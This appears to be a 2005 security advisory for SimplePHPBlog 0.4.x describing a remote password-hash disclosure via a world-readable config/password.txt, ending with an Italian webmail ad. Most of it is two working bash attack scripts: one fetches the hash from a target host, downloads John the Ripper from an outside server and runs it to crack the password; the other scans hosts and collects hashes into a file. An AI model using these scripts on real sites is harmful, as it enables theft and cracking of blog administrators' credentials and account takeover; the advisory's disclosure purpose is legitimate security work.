__ .__ ______ |__|_____ | | ___.__. \____ \ | \____ \| |< | | | |_> > | | |_> > |_\___ | | __/\__| | __/|____/ ____| |__| \______|__| \/ Where is the security? ... Security Advisory 2005-0x00 Authors......... pjphem && LazyCrs Date............ 07/07/2005 Vendor.......... www.simplephpblog.com Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure o The Problem: -------------- bash-3.00# cat install02.php $result = create_folder( 'config' ); bash-3.00# cat sb_login.php // If there's no password file then need to redirect them. $passFile = 'config/password.txt'; ---------------------------------------------------------------------------------------- function create_password ( $user, $pass ) { // Generate and store password hash $mypasswd = $user.$pass; $hashed = crypt($mypasswd); // Save File $filename = 'config/password.txt'; $result = sb_write_file( $filename, $hashed ); ---------------------------------------------------------------------------------------- function check_password ( $user, $pass ) { // Check password against hashed password file $passFile = 'config/password.txt'; $hashed = sb_read_file( $passFile ); bash-3.00# ls -l `pwd` |grep config drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config o Proof of concept: ------------------- bash-3.00$ cat 0xfuck-phpblog.sh #!/bin/bash ################################################################### # # 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy) # # 0xpjply CONFIDENTIAL - SOURCE MATERIALS # # This is published proprietary source code of 0xpjply # # (C) COPYRIGHT 0xpjply security guru group, 2005 # All Rights Reserved # # dummy exploit written by pjphem && infected on July 2005 # ################################################################### # contact: # pjphem && LazyCrs # # pjphem@mybox.it && fLazyCrs@GMail.com # #Greetz: # # You think you know? You have no idea! # fluffi- # # # # RAFA FREE # ################################################################### echo "" echo "" echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := " echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " echo "" echo " c0de by pjphem " echo "" echo "" echo " vulnerabili Simple php blog 0.4.4 <= " echo "" echo "" echo -n "inserisci un hostname: " ; read hostname ; echo -n "inserisci dir: " ; read dir ; echo "" echo "[*] praparando l'ambiente..." mkdir 0xpjply cd 0xpjply echo -t3 "[*] OK!" echo "[*] Cattura password..." wget http://$hostname/$dir/config/password.txt echo "[*] OK!" echo "" echo "" echo "Show password: (md5)" echo "" cat password.txt echo "" rm -rf password.txt echo "" echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] " read Q if [ $Q = y ]; then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz else exit 1; fi tar -zxf john.tar.gz cd john echo "" echo "[*] Dowloading password.." echo "" wget http://$hostname/$dir/config/password.txt echo "" echo "Done!" echo "" echo "STARING John for decript password.. enJoy" ./jonh password.txt echo "" echo "" bash-3.00$ bash-3.00$ cat 0xfuck-phpblog-scanner.sh #!/bin/bash # # Simple tester for phpblog # # phpblog 0.4.4 <= # ####################################### echo "host , directory blog: (ex. test.it blog)" read HOST BLOG lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3 bash-3.00$ --------------------------------------------------------------- Scegli il tuo dominio preferito e attiva la tua email! Da oggi l'eMail di superEva e' ancora piu' veloce e ricca di funzioni! http://webmail.supereva.it/new/ ---------------------------------------------------------------